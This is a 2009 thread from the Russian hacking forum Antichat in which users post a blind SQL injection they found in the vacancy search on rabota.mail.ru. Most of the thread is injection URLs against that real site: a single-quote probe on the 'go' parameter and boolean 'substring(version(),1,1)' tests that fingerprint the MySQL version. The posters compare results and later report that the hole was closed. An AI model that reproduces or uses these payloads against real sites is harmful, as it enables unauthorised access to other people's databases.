Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   баг на mail.ru (https://forum.antichat.xyz/showthread.php?t=108206)

-m0rgan- 26.02.2009 21:05

баг на mail.ru
 
Вот нашол SQL injection на mail.ru
Crekm слепая, без вывода...
внимательно смотрим на формировку наги:
Код:

http://rabota.mail.ru/vac_search/?go=1&from_search=1&query=
Код:

http://rabota.mail.ru/vac_search/?go=1'&from_search=1&query=
смотрим версию мускула:
Код:

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=5--&from_search=1&query=
пятая...

вроди как возможно внедрение SQL кода...

Дальше не докрутил, ибо не силён в подзапросах...

R1dex 26.02.2009 21:21

Не знаю, какая там 5-ая...

У меня страница

Код:

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=5--&from_search=1&query=
и

Код:

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=4--&from_search=1&query=
одинаковые..

А вот так:

Код:

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=3--&from_search=1&query=
Другой результат...

-m0rgan- 26.02.2009 21:25

у меня новости меняются.

-m0rgan- 26.02.2009 21:27

да и не в версии дело, бага то есть...

R1dex 26.02.2009 21:32

Ну, в случае с маилом, уже не особо удивляет блинд скуля.. Учитывая, что недавно была инъекция с выводом ^^

_==wolf==_ 26.02.2009 21:32

прикрыли о_О

R1dex 26.02.2009 21:33

Ну да, я cразу зашёл и прикрыл ^^

_==wolf==_ 26.02.2009 21:34

да правда прикрыли!

-m0rgan- 26.02.2009 21:48

Я это багу нашол недели 3 назад...

Ponchik 26.02.2009 21:51

Смысл ложить такое в паблик =\


Время: 12:39